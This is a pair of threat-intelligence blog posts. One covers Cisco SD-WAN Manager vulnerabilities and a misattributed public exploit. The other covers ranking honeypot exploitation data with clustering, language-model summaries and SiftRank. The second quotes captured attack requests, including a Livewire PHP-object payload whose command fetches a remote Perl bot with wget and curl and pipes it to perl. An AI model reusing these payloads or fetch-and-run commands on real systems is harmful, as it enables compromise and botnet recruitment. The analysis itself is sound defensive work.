Access Intelligence team has been analyzing a slew of different Cisco vulnerabilities over the past week and change. As is typical for emerging threat vulnerabilities, our team has seen a variety of incorrectly attributed or fake public PoCs for several of these flaws; this blog details research team observations across more than half a dozen different CVEs in Cisco Catalyst SD-WAN Manager.",[18,11268,11269],{},"Our team’s ASM queries for Cisco Catalyst SD-WAN show a range of results, depending on the engine: ZoomEye finds roughly 275 internet-exposed instances, Shodan and Censys discover between 450 and 550, and FOFA shows upwards of a thousand.",[61,11271,11273],{"id":11272},"background","Background",[18,11275,11276,11277,11281,11282,11285,11286,11291,11292,11296,11297,11302],{},"On February 25, 2026, Cisco’s Talos team ",[47,11278,11280],{"href":11279},"%E2%80%8B%E2%80%8Bhttps:\u002F\u002Fblog.talosintelligence.com\u002Fuat-8616-sd-wan\u002F","published a blog"," disclosing in-the-wild exploitation of two vulnerabilities in Catalyst SD-WAN Manager: ",[47,11283,526],{"href":524,"rel":11284},[51],", a CVSS-10 zero-day flaw in Catalyst SD-WAN Controller’s peering authentication that allowed unauthenticated adversaries to bypass authentication and gain initial (administrative) access; and ",[47,11287,11290],{"href":11288,"rel":11289},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2022-20775",[51],"CVE-2022-20775",", an older, previously unexploited vulnerability in the SD-WAN CLI that delivered post-auth privilege escalation and remote command execution as root. Threat activity targeting the two vulnerabilities was traced back to 2023 and attributed to UAT-8616, which the Talos team deemed “a highly sophisticated cyber threat actor.” In addition to Cisco’s ",[47,11293,11046],{"href":11294,"rel":11295},"https:\u002F\u002Fblog.talosintelligence.com\u002Fuat-8616-sd-wan\u002F",[51],", which contains investigative guidance, the Australian Signals Directorate released a ",[47,11298,11301],{"href":11299,"rel":11300},"https:\u002F\u002Fwww.cyber.gov.au\u002Fsites\u002Fdefault\u002Ffiles\u002F2026-02\u002FACSC-led%20Cisco%20SD-WAN%20Hunt%20Guide.pdf",[51],"41-page tradecraft and threat hunting report"," on the zero-day exploit in conjunction with Five Eyes intelligence partners.",[18,11304,11305,11306,11309],{},"While the majority of the community’s interest has (understandably) focused on CVE-2026-20127, the zero-day initial access vulnerability, Cisco also published an aggregate ",[47,11307,5359],{"href":1001,"rel":11308},[51]," for five other flaws in Catalyst SD-WAN Manager:",[22,11311,11312,11318,11326,11336,11348],{},[25,11313,11314,11317],{},[47,11315,803],{"href":801,"rel":11316},[51],", an authenticated file overwrite issue in the SD-WAN Manager API that the VulnCheck team exploited to upload a webshell to a vulnerable target system;",[25,11319,11320,11325],{},[47,11321,11324],{"href":11322,"rel":11323},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-20126",[51],"CVE-2026-20126",", a post-authentication privilege escalation to root via the REST API;",[25,11327,11328,11331,11332,11335],{},[47,11329,761],{"href":759,"rel":11330},[51],", an authenticated file read vulnerability that allows for Data Collection Agent (DCA) user takeover, provided the attacker has valid ",[886,11333,11334],{},"vmanage"," credentials;",[25,11337,11338,11343,11344,11347],{},[47,11339,11342],{"href":11340,"rel":11341},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-20129",[51],"CVE-2026-20129",", an authentication bypass that gives remote, unauthenticated adversaries access to the ",[886,11345,11346],{},"netadmin"," user; and",[25,11349,11350,11353],{},[47,11351,783],{"href":781,"rel":11352},[51],", an unauthenticated information disclosure issue in the SD-WAN Manager API",[307,11355,11356,11372],{},[310,11357,11358],{},[313,11359,11360,11362,11364,11366,11369],{},[316,11361,319],{},[316,11363,10625],{},[316,11365,3679],{},[316,11367,11368],{},"Exploited?",[316,11370,11371],{},"EPSS",[336,11373,11374,11390,11405,11420,11433,11447,11462],{},[313,11375,11376,11378,11381,11384,11387],{},[341,11377,526],{},[341,11379,11380],{},"Cisco Catalyst SD-WAN Controller Authentication Bypass",[341,11382,11383],{},"10 (Critical)",[341,11385,11386],{},"Yes, zero-day",[341,11388,11389],{},"0.02604",[313,11391,11392,11394,11397,11400,11402],{},[341,11393,11290],{},[341,11395,11396],{},"Cisco SD-WAN CLI Privilege Escalation",[341,11398,11399],{},"7.8 (High)",[341,11401,383],{},[341,11403,11404],{},"0.00499",[313,11406,11407,11409,11412,11415,11417],{},[341,11408,803],{},[341,11410,11411],{},"Cisco Catalyst SD-WAN Manager API File Overwrite",[341,11413,11414],{},"5.4 (Medium)",[341,11416,383],{},[341,11418,11419],{},"0.00042",[313,11421,11422,11424,11427,11429,11431],{},[341,11423,11324],{},[341,11425,11426],{},"Cisco Catalyst SD-WAN Manager Privilege",[341,11428,11399],{},[341,11430,359],{},[341,11432,11419],{},[313,11434,11435,11437,11439,11442,11444],{},[341,11436,761],{},[341,11438,764],{},[341,11440,11441],{},"7.5 (High)",[341,11443,383],{},[341,11445,11446],{},"0.00019",[313,11448,11449,11451,11454,11457,11459],{},[341,11450,11342],{},[341,11452,11453],{},"Cisco Catalyst SD-WAN Manager API Improper Authentication",[341,11455,11456],{},"9.8 (Critical)",[341,11458,359],{},[341,11460,11461],{},"0.00148",[313,11463,11464,11466,11469,11471,11473],{},[341,11465,783],{},[341,11467,11468],{},"Cisco Catalyst SD-WAN Manager API Information Disclosure",[341,11470,11441],{},[341,11472,359],{},[341,11474,11475],{},"0.00047",[18,11477,11478,11479,11482,11483,982,11485,11487],{},"None of the additional CVEs above was listed as exploited in the wild at time of disclosure, but on March 5, Cisco updated their ",[47,11480,5359],{"href":1001,"rel":11481},[51]," to reflect that both ",[295,11484,761],{},[295,11486,803],{}," were seeing active exploitation. Both issues were immediately added to VulnCheck’s KEV; as of March 11, neither is on CISA KEV.",[18,11489,11490,11491,11496,11497,11502,11503,11506],{},"Since public disclosure of CVE-2026-20127, several ",[47,11492,11495],{"href":11493,"rel":11494},"https:\u002F\u002Fx.com\u002Fethicalhack3r\u002Fstatus\u002F2029244376908435492",[51],"firms"," have ",[47,11498,11501],{"href":11499,"rel":11500},"https:\u002F\u002Fx.com\u002FSimoKohonen\u002Fstatus\u002F2029483790909702425",[51],"observed"," in-the-wild exploitation using a public proof of concept released March 3 — except, as it turns out, that public PoC doesn’t actually exploit CVE-2026-20127 at all, but rather several other completely different vulnerabilities. CVE-2026-20127 exploitation detections based on the March 3 ",[886,11504,11505],{},"zerozenxlabs"," PoC, in other words, is incorrectly attributed.",[61,11508,11510],{"id":11509},"vulncheck-research-observations","VulnCheck Research Observations",[18,11512,11513,11514,11519,11520,10515,11522,11527],{},"As is typical with emerging threat vulnerabilities, several public proof-of-concept exploits that claimed to target CVE-2026-20127 hit code-sharing platforms not long after the vulnerability was published. Since VulnCheck’s research team validates and curates ",[47,11515,11518],{"href":11516,"rel":11517},"https:\u002F\u002Fwww.vulncheck.com\u002Fxdb",[51],"public exploits",", we reviewed and discarded several fake or otherwise non-functional exploits. On March 3, GitHub user ",[886,11521,11505],{},[47,11523,11526],{"href":11524,"rel":11525},"https:\u002F\u002Fgithub.com\u002Fzerozenxlabs\u002FCVE-2026-20127---Cisco-SD-WAN-Preauth-RCE",[51],"posted PoC code"," that purportedly exploited CVE-2026-20127.",[18,11529,11530,11531,11533,11534,11537,11538,11540,11541,11546,11547,11549],{},"Our team tested the exploit against a live SD-WAN target, and determined that while it ",[1131,11532,5650],{}," a valid exploit, it ",[295,11535,11536],{},"does not"," exploit CVE-2026-202127 at all, but rather three of the other vulnerabilities Cisco disclosed in SD-WAN Manager: CVE-2026-20133 and CVE-2026-20128 are used to leak and read the DCA credential file, after which the exploit leverages CVE-2026-20122 in the API to upload a webshell. CVE-2026-20127, by contrast, affects peering authentication between vManagers and vControllers, which is a completely different area of the code base that the ",[886,11539,11505],{}," PoC never touches. Rapid7’s Stephen Fewer ",[47,11542,11545],{"href":11543,"rel":11544},"https:\u002F\u002Fgithub.com\u002Fsfewer-r7\u002FCVE-2026-20127",[51],"published an exploit"," that ",[1131,11548,4563],{}," actually target CVE-2026-20127 on March 11, which means in-the-wild exploit attempts against the real vulnerability are likely to pick up.",[18,11551,11552,11553,11556,11557,11562,11563,11566,11567,11572,11573,11577],{},"Cisco still has not indicated any known exploitation of CVE-2026-20133, which is somewhat surprising, considering that the file system access the vulnerability provides allowed our research team to extract the ",[886,11554,11555],{},"vmanage-admin"," user’s private key and compromise the Network Configuration Protocol (NETCONF) used to ",[47,11558,11561],{"href":11559,"rel":11560},"https:\u002F\u002Fwww.cisco.com\u002Fc\u002Fen\u002Fus\u002Ftd\u002Fdocs\u002Fsolutions\u002FCVD\u002FSDWAN\u002Fcisco-sdwan-design-guide.html#:~:text=The%20NETCONF%20protocol%20defines%20a,NETCONF%20for%20communication%20with%20SD",[51],"configure and manage"," SD-WAN devices. The VulnCheck team also used CVE-2026-20133 to leak ",[886,11564,11565],{},"confd_ipc_secret",", allowing any local user to escalate to an unconstrained root shell. Notably, this is the same technique documented by ",[47,11568,11571],{"href":11569,"rel":11570},"https:\u002F\u002Fwww.orange.com\u002F",[51],"Orange group","’s Cyrille CHATRAS, who discovered and reported SD-WAN Manager ",[47,11574,11290],{"href":11575,"rel":11576},"https:\u002F\u002Fgithub.com\u002Forangecertcc\u002Fsecurity-research\u002Fsecurity\u002Fadvisories\u002FGHSA-wmjv-552v-pxjc",[51]," back in 2021.",[18,11579,11580,11581,11583],{},"Defenders who are using the ",[886,11582,11505],{}," PoC to inform signatures have a good start on detecting any potential CVE-2026-20133 exploitation, but should note that CVE-2026-20133 can leak any file on the filesystem and is not limited to leaking the DCA user secret specifically.",[61,11585,1903],{"id":1902},[18,11587,11588],{},"Early exploits and industry attention on emerging threats can be useful for understanding likely exploitation paths and vulnerability nuances, but they can also lead organizations astray when they rely on untested research artifacts or overly narrow focus on specific attack paths. VulnCheck’s Initial Access Intelligence team applies an exploit-first lens to broad swaths of vulnerabilities, validating and improving upon public research artifacts while developing original capabilities and insights.",[61,11590,202],{"id":201},[18,11592,11593,11594,1246,11597,1255,11602,59],{},"VulnCheck’s Initial Access Intelligence team is always on the hunt for new exploits and fresh shells. By delivering machine-consumable, evidence-driven intelligence on new vulnerabilities and how attackers can actually use them, VulnCheck helps organizations prepare earlier, respond decisively, and verify exploitation without relying on scores or delayed consensus. For more research like this, see ",[47,11595,10339],{"href":10337,"rel":11596},[51],[47,11598,11601],{"href":11599,"rel":11600},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fmetro4shell_eitw",[51],"Metro4Shell: Exploitation of React Native’s Metro Server in the Wild",[47,11603,10344],{"href":10342,"rel":11604},[51],[18,11606,1228,11607,1234,11610,1240,11613,1246,11616,1255,11619,1260],{},[47,11608,1233],{"href":1231,"rel":11609},[51],[47,11611,1239],{"href":1237,"rel":11612},[51],[47,11614,1245],{"href":1243,"rel":11615},[51],[47,11617,1251],{"href":1249,"rel":11618},[51],[47,11620,216],{"href":1258,"rel":11621},[51],{"title":219,"searchDepth":220,"depth":220,"links":11623},[11624,11625,11626,11627,11628],{"id":3520,"depth":220,"text":20},{"id":11272,"depth":220,"text":11273},{"id":11509,"depth":220,"text":11510},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"2026-03-12","VulnCheck’s Initial Access Intelligence team has been tracking and analyzing half a dozen recent vulnerabilities in Cisco Catalyst SD-WAN Manager, several of which have begun to see in-the-wild exploitation. Industry focus has been on CVE-2026-20127, but several other vulnerabilities also pose significant risk.",{"slug":11632},"cisco-sd-wan-manager-vulns","\u002Fblog\u002Fcisco-sd-wan-manager-vulns",{"title":10334,"description":11630},"blog\u002Fcisco-sd-wan-manager-vulns",[242,1281,1279],"12rkiHSJdCWgCDEN9Zj5t6kmQm0MJG5T6vGxeEv3HEY",{"id":11639,"title":11640,"articles":7,"authors":11641,"body":11643,"date":12112,"description":12113,"extension":234,"image":7,"link":7,"meta":12114,"navigation":237,"path":12116,"seo":12117,"series":7,"stem":12118,"subtype":7,"tags":12119,"__hash__":12120},"blog\u002Fblog\u002Fsiftrank_canaries.md","SiftRanking Canary Intelligence",[11642],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":11644,"toc":12101},[11645,11649,11656,11673,11677,11680,11683,11686,11689,11693,11696,11699,11705,11711,11714,11717,11794,11797,11876,11879,11883,11886,11889,11892,11909,11912,11915,11929,11932,11935,11948,11951,11955,11958,11961,11964,11970,11973,11979,11982,11986,11989,12007,12014,12020,12023,12030,12033,12042,12044,12047,12050,12052,12078,12098],[61,11646,11648],{"id":11647},"introduction","Introduction",[18,11650,11651,11652,11655],{},"On a typical day, VulnCheck ",[47,11653,283],{"href":281,"rel":11654},[51]," captures thousands of active exploitation attempts targeting production systems. Within that volume are routine patterns, evolving tradecraft, and occasionally something that demands immediate scrutiny. The problem is knowing which is which.",[18,11657,11658,11659,11664,11665,11672],{},"Customers regularly ask how VulnCheck intelligence can be integrated into AI-driven workflows. Prioritization is a natural starting point. Caleb Gross’ ",[47,11660,11663],{"href":11661,"rel":11662},"https:\u002F\u002Fgithub.com\u002Fnoperator\u002Fsiftrank",[51],"SiftRank",", introduced in \"",[1131,11666,11667],{},[47,11668,11671],{"href":11669,"rel":11670},"https:\u002F\u002Farxiv.org\u002Fpdf\u002F2512.06155",[51],"Sift or Get Off the PoC: Applying Information Retrieval to Vulnerability Research with SiftRank","\", provides a practical way to rank exploitation activity and surface the entries that warrant deeper investigation.",[61,11674,11676],{"id":11675},"ranking-requires-preprocessing","Ranking Requires Preprocessing",[18,11678,11679],{},"Two constraints become immediately apparent.",[18,11681,11682],{},"First, SiftRank operates on natural language. Canary Intelligence does not. It consists of JSON records, raw HTTP requests, serialized payloads, and exploit artifacts. Feeding that directly into SiftRank produces unreliable output.",[18,11684,11685],{},"Second, scale introduces inefficiency. A 10-day Canary export contains tens of thousands of exploitation attempts. Attackers routinely reuse scanners and exploit templates, which results in substantial payload similarity across entries. Ranking each variation independently increases processing cost without adding new insight.",[18,11687,11688],{},"Before SiftRank could be useful, the data had to be transformed.",[993,11690,11692],{"id":11691},"clustering-similar-payloads-with-tlsh","Clustering Similar Payloads with TLSH",[18,11694,11695],{},"The first preprocessing step is to cluster similar payloads using TLSH, a locality sensitive hashing algorithm designed for fuzzy similarity comparisons. TLSH does not attempt semantic understanding. Instead, it groups payloads based on structural similarity, which is sufficient to collapse minor variations of the same exploit pattern.",[18,11697,11698],{},"The following two payloads were observed within the same 10-day Canary export. They target the same endpoint and use the same JSON structure, but differ in the specific values supplied during exploitation:",[1354,11700,11703],{"className":11701,"code":11702,"language":1359},[1357],"POST \u002Fapi\u002Fv1\u002Fsettings\u002Fsysadmin\u002Fconnect-to-hub HTTP\u002F1.1\nHost: VC_REDACTED\nUser-Agent: python-cli\nContent-Type: application\u002Fjson\n\n{\"hubAddress\": \"http:\u002F\u002F138.4.32.1:8082\", \"oneTimePassword\": \"pwn\", \"nodeName\": \"victim-1771971513\"}\n",[886,11704,11702],{"__ignoreMap":219},[1354,11706,11709],{"className":11707,"code":11708,"language":1359},[1357],"POST \u002Fapi\u002Fv1\u002Fsettings\u002Fsysadmin\u002Fconnect-to-hub HTTP\u002F1.1\nHost: VC_REDACTED\nUser-Agent: python-cli\nContent-Type: application\u002Fjson\n\n{\"hubAddress\": \"http:\u002F\u002F138.4.32.1:8082\", \"oneTimePassword\": \"test\", \"nodeName\": \"tests\"}\n",[886,11710,11708],{"__ignoreMap":219},[18,11712,11713],{},"An exact hash treats these as unrelated strings. Under a similarity threshold of 75, TLSH produces a distance of 43 between these two payloads and places them into the same cluster. From a prioritization perspective, ranking both independently adds cost without adding insight. They represent the same underlying exploitation pattern.",[18,11715,11716],{},"For each decoded payload, a TLSH hash is generated when sufficient data is available:",[1354,11718,11722],{"className":11719,"code":11720,"language":11721,"meta":219,"style":219},"language-python shiki shiki-themes material-theme-lighter github-light github-dark monokai","if len(payload) > 50:\n try:\n tlsh_hash = tlsh.hash(payload.encode())\n except:\n pass\n","python",[886,11723,11724,11748,11755,11782,11789],{"__ignoreMap":219},[1373,11725,11726,11728,11731,11733,11737,11739,11742,11745],{"class":1375,"line":1376},[1373,11727,4637],{"class":4636},[1373,11729,11730],{"class":1379}," len",[1373,11732,1384],{"class":1383},[1373,11734,11736],{"class":11735},"sAZ-3","payload",[1373,11738,2230],{"class":1383},[1373,11740,11741],{"class":1397}," >",[1373,11743,11744],{"class":5467}," 50",[1373,11746,11747],{"class":1383},":\n",[1373,11749,11750,11753],{"class":1375,"line":220},[1373,11751,11752],{"class":4636}," try",[1373,11754,11747],{"class":1383},[1373,11756,11757,11760,11762,11765,11767,11770,11772,11774,11776,11779],{"class":1375,"line":1266},[1373,11758,11759],{"class":4640}," tlsh_hash ",[1373,11761,5417],{"class":1397},[1373,11763,11764],{"class":4640}," tlsh",[1373,11766,59],{"class":1383},[1373,11768,11769],{"class":11735},"hash",[1373,11771,1384],{"class":1383},[1373,11773,11736],{"class":11735},[1373,11775,59],{"class":1383},[1373,11777,11778],{"class":11735},"encode",[1373,11780,11781],{"class":1383},"())\n",[1373,11783,11784,11787],{"class":1375,"line":1852},[1373,11785,11786],{"class":4636}," except",[1373,11788,11747],{"class":1383},[1373,11790,11791],{"class":1375,"line":4692},[1373,11792,11793],{"class":4636}," pass\n",[18,11795,11796],{},"Payloads were then grouped by similarity threshold:",[1354,11798,11800],{"className":11719,"code":11799,"language":11721,"meta":219,"style":219},"dist = tlsh.diff(tl, members[0][\"_tlsh\"])\nif dist \u003C TLSH_THRESHOLD:\n members.append(r)\n",[886,11801,11802,11843,11858],{"__ignoreMap":219},[1373,11803,11804,11807,11809,11811,11813,11816,11818,11821,11823,11826,11828,11830,11833,11835,11838,11840],{"class":1375,"line":1376},[1373,11805,11806],{"class":4640},"dist ",[1373,11808,5417],{"class":1397},[1373,11810,11764],{"class":4640},[1373,11812,59],{"class":1383},[1373,11814,11815],{"class":11735},"diff",[1373,11817,1384],{"class":1383},[1373,11819,11820],{"class":11735},"tl",[1373,11822,5437],{"class":1383},[1373,11824,11825],{"class":11735}," members",[1373,11827,7035],{"class":1383},[1373,11829,445],{"class":5467},[1373,11831,11832],{"class":1383},"][",[1373,11834,183],{"class":1387},[1373,11836,11837],{"class":1391},"_tlsh",[1373,11839,183],{"class":1387},[1373,11841,11842],{"class":1383},"])\n",[1373,11844,11845,11847,11850,11853,11856],{"class":1375,"line":220},[1373,11846,4637],{"class":4636},[1373,11848,11849],{"class":4640}," dist ",[1373,11851,11852],{"class":1397},"\u003C",[1373,11854,11855],{"class":2326}," TLSH_THRESHOLD",[1373,11857,11747],{"class":1383},[1373,11859,11860,11863,11865,11868,11870,11873],{"class":1375,"line":1266},[1373,11861,11862],{"class":4640}," members",[1373,11864,59],{"class":1383},[1373,11866,11867],{"class":11735},"append",[1373,11869,1384],{"class":1383},[1373,11871,11872],{"class":11735},"r",[1373,11874,11875],{"class":1383},")\n",[18,11877,11878],{},"After clustering, the dataset is reduced from approximately 70,000 raw entries to roughly 1,400 representative clusters suitable for ranking. Ranking becomes computationally tractable and no longer dominated by repeated exploit templates.",[993,11880,11882],{"id":11881},"normalizing-exploitation-into-language","Normalizing Exploitation into Language",[18,11884,11885],{},"With structural duplication addressed, the next challenge is translating exploit traffic into something SiftRank can understand. Raw exploitation payloads are anything but. They are transport artifacts composed of HTTP headers, JSON bodies, encoded commands, and infrastructure references, all structured for client-server communication.",[18,11887,11888],{},"To make the payloads usable for ranking, they must be translated into concise descriptions. Before doing so, structured features are extracted from each clustered record to anchor the description in observable behavior rather than raw syntax.",[18,11890,11891],{},"From each Canary entry, the preprocessing stage attempts to extract:",[22,11893,11894,11897,11900,11903,11906],{},[25,11895,11896],{},"Referenced CVE identifiers",[25,11898,11899],{},"HTTP method and content type",[25,11901,11902],{},"Indicators of command execution such as curl, wget, gsocket, echo, base64, or PowerShell",[25,11904,11905],{},"Extracted C2 IP address and port",[25,11907,11908],{},"Observed frequency of the attacker source",[18,11910,11911],{},"These features provide context that raw request text alone does not reliably convey. Rather than asking a language model to interpret unstructured payload data, the model receives both the payload and a distilled set of behavioral signals.",[18,11913,11914],{},"Each clustered record is then sent to OpenAI using a constrained prompt that requests a concise description of:",[22,11916,11917,11920,11923,11926],{},[25,11918,11919],{},"The apparent vulnerability being targeted",[25,11921,11922],{},"The exploitation technique",[25,11924,11925],{},"Any post-exploitation behavior",[25,11927,11928],{},"Referenced infrastructure",[18,11930,11931],{},"The goal is not to generate prose. It is to produce short, comparable descriptions that capture intent.",[18,11933,11934],{},"For example, the following description was generated from a clustered record within the 10-day Canary backup:",[1925,11936,11937],{},[18,11938,11939,11940,11943,11944,11947],{},"The observed exploit attempt targeting CVE-2023-26801 utilizes an HTTP POST request to the endpoint ",[886,11941,11942],{},"\u002Fgoform\u002Fset_LimitClient_cfg",", injecting parameters that include a command to download and execute a malicious script from an external server. The payload retrieves a file from ",[886,11945,11946],{},"http:\u002F\u002Fbasic1997.duckdns.org:8443\u002Fo",", changes its permissions to 777, executes it, and subsequently deletes it along with any related files. This activity was exclusively sourced from Germany and directed towards the United States, with a total of 9 occurrences out of 10,703 requests, indicating a rare but focused exploitation effort leveraging the identified external infrastructure.",[18,11949,11950],{},"These normalized descriptions become the input to SiftRank.",[61,11952,11954],{"id":11953},"ranking-normalized-exploitation-with-siftrank","Ranking Normalized Exploitation with SiftRank",[18,11956,11957],{},"With approximately 1,400 clustered records translated into descriptions, the dataset is ready for ranking.",[18,11959,11960],{},"SiftRank is applied across the full set of generated descriptions using a prompt designed to prioritize investigative value rather than raw frequency. The goal is comparative scoring, not classification.",[18,11962,11963],{},"The ranking prompt explicitly defines what “interesting” means:",[1354,11965,11968],{"className":11966,"code":11967,"language":1359},[1357],"You are a senior threat intelligence analyst prioritizing activity for investigation.\n\nRank the following items according to investigative value and actionable intelligence.\n\nPrioritize items that:\n- Use external C2 infrastructure that appears novel or not widely commoditized\n- Download or execute secondary payloads\n- Show infrastructure reuse suggesting an active campaign\n- Demonstrate operator-controlled tradecraft\n- Provide infrastructure suitable for pivoting or attribution\n\nDeprioritize items that:\n- Represent legacy or widely commoditized botnet malware\n- Reflect repetitive mass scanning or exploit spray behavior\n- Use long-standing recycled infrastructure\n- Appear to be background internet noise\n\nDo not rank purely by prevalence. Favor novelty, leverage, infrastructure value, and investigative opportunity\n",[886,11969,11967],{"__ignoreMap":219},[18,11971,11972],{},"SiftRank is then invoked directly against the generated descriptions:",[1354,11974,11977],{"className":11975,"code":11976,"language":1359},[1357],"\u002Fgo\u002Fbin\u002Fsiftrank -f .\u002Fcanary-sentences -o sift-out.json -p @prompt\n",[886,11978,11976],{"__ignoreMap":219},[18,11980,11981],{},"On a 10-day Canary export reduced to approximately 1,400 clustered records, the ranking process completed in roughly eight minutes.",[61,11983,11985],{"id":11984},"what-rose-to-the-top","What Rose to the Top",[18,11987,11988],{},"Among the highest ranked entries were several unique XWiki and React2Shell exploitations. Just below those, at number four, was a Livewire exploitation cluster. The normalized description for that activity reads:",[1925,11990,11991],{},[18,11992,11993,11994,11997,11998,12001,12002,982,12004,12006],{},"The exploit targeting CVE-2025-54068 leverages a crafted HTTP POST request to the ",[886,11995,11996],{},"\u002Flivewire\u002Fupdate"," endpoint, injecting a serialized PHP object that facilitates remote code execution (RCE) through untrusted data handling. The payload includes commands to retrieve and execute a secondary payload from the external IP ",[886,11999,12000],{},"61.14.210.71",", utilizing tools like ",[886,12003,1553],{},[886,12005,1557],{},". This activity has been observed in a limited capacity, with only 10 occurrences, predominantly originating from Indonesia (6) and South Korea (3), and targeting Brazil (4), India (4), and the UK (2).",[18,12008,12009,12010,12013],{},"The actual payload, which followed an initial ",[886,12011,12012],{},"GET \u002F"," request to verify that the target was running Livewire, contained a serialized PHP object chain designed to invoke system commands. Truncated for readability, the relevant portion is shown below:",[1354,12015,12018],{"className":12016,"code":12017,"language":1359},[1357],"POST \u002Flivewire\u002Fupdate HTTP\u002F1.1\nHost: VC_REDACTED\nUser-Agent: python-requests\u002F2.32.4\nContent-Type: application\u002Fjson\n\n...\n\"extensions\";a:1:{s:0:\"\";s:6:\"system\";}\n...\n\"wget -qO - 61.14.210.71\u002F.j\u002Fsus|perl ; curl -s 61.14.210.71\u002F.j\u002Fsus|perl\"\n...\n",[886,12019,12017],{"__ignoreMap":219},[18,12021,12022],{},"This was not a simple probe. The injected command retrieves and executes a secondary payload hosted on attacker-controlled infrastructure.",[18,12024,12025,12026,12029],{},"That payload is a fully featured Perl-based IRC bot. Once executed, it connects to ",[886,12027,12028],{},"178.63.42.199"," on TCP port 88, joins a predefined IRC channel, and exposes a broad command surface that includes UDP, TCP, and HTTP flooding, port scanning, SQL scanning, reverse shell functionality, and log wiping routines. In effect, the objective is to convert the vulnerable host into an actively managed botnet node.",[18,12031,12032],{},"Under the SiftRank criteria, this entry rose to the top because it combines external C2 infrastructure, a substantial secondary payload suitable for reverse engineering, and pivotable IP artifacts that enable clustering and campaign tracking. It reflects operator-directed tradecraft rather than indiscriminate exploit spray behavior.",[18,12034,12035,12036,12041],{},"This type of activity is exactly what Canary is intended to surface. In this case, ",[47,12037,12040],{"href":12038,"rel":12039},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2026-01-30#cve-2025-54068-livewire-rce-via-php-object-unmarshalling",[51],"coverage"," for the Livewire CVE itself was requested by a customer, which makes the observed exploitation especially relevant. The ranking elevated it not because it was frequent, but because it provided actionable infrastructure and clear operator intent.",[61,12043,1903],{"id":1902},[18,12045,12046],{},"At VulnCheck, we collect exploitation telemetry, vulnerability intelligence, exploit data, internet-wide scanning results, and conduct original vulnerability research, all of which can be structured and fed directly into AI-driven workflows to prioritize threats, guide analyst tasks, and focus research on what carries operational value.",[18,12048,12049],{},"The opportunity is simple: use the data. Let the model help you decide where to start.",[61,12051,202],{"id":201},[18,12053,10768,12054,1246,12057,10775,12060,10779,12063,1246,12068,1246,12073,59],{},[47,12055,283],{"href":281,"rel":12056},[51],[47,12058,216],{"href":1258,"rel":12059},[51],[47,12061,1251],{"href":1249,"rel":12062},[51],[47,12064,12066],{"href":10782,"rel":12065},[51],[1131,12067,10786],{},[47,12069,12071],{"href":10789,"rel":12070},[51],[1131,12072,10793],{},[47,12074,10798,12076],{"href":10796,"rel":12075},[51],[1131,12077,10801],{},[18,12079,1228,12080,1234,12083,1240,12086,1246,12089,1246,12092,1255,12095,1260],{},[47,12081,1233],{"href":10806,"rel":12082},[51],[47,12084,1239],{"href":1237,"rel":12085},[51],[47,12087,1245],{"href":1243,"rel":12088},[51],[47,12090,1251],{"href":1249,"rel":12091},[51],[47,12093,283],{"href":281,"rel":12094},[51],[47,12096,216],{"href":1258,"rel":12097},[51],[2901,12099,12100],{},"html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sAZ-3, html code.shiki .sAZ-3{--shiki-light:#6182B8;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code 